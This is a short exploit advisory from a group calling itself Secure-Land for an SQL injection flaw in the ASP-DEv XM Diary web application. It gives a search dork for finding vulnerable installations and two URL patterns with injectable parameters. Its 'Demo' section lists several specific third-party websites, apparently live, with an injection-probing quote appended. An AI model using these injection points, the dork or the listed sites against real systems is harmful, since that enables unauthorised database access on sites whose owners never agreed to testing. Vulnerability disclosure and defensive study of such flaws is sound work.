########################################################################################
#                                                                                      #
# Exploit Title : ASP-DEv XM Diary SQL Injection Vulnerability                         #
#                                                                                      #
# Author        : Secure-Land Security Team                                            #
#                                                                                      #
# Discovered By : farbodmahini                                                         #
#                                                                                      #
# Home          : Secure-Land.net                                                      #
#                                                                                      #
# Version       : All Version                                                          #
#                                                                                      #
# Software Link : http://www.asp-dev.com/download.asp?did=2                            #
#                                                                                      #
# Contact       : farbodmahini@yahoo.fr , farbodmahini@gmail.com                       #
#                                                                                      #
# Security Risk : High                                                                 #
#                                                                                      #
#  DorK         : "Powered by ASP-DEv XM Diary"                                        #
#                                                                                      #
#                                                                                      #
########################################################################################
#                                                                                      #
#  Expl0iT:                                                                            #
#                                                                                      #
#  http://[TarGeT]/[patch]/diary_view.asp?id=[SQL]                                     #
#  http://[TarGeT]/[patch]/default.asp?view_date=[SQL]                                 #
#                                                                                      #
#                                                                                      #
#  Demo :                                                                              #
#                                                                                      #
#  http://www.suffolkwaterpark.com/event_diary/default.asp?view_date=40142'            #
#  http://www.suffolkwaterpark.com/event_diary/diary_view.asp?id=301'                  #
#  http://www.cci.ca/NORTHALBERTA/EVENTS/diary_view.asp?id=133'                        #
#  http://www.knoebels.com/calendar/diary_view.asp?id=545'                             #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us                                  #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id              #
#                                                                                      #
########################################################################################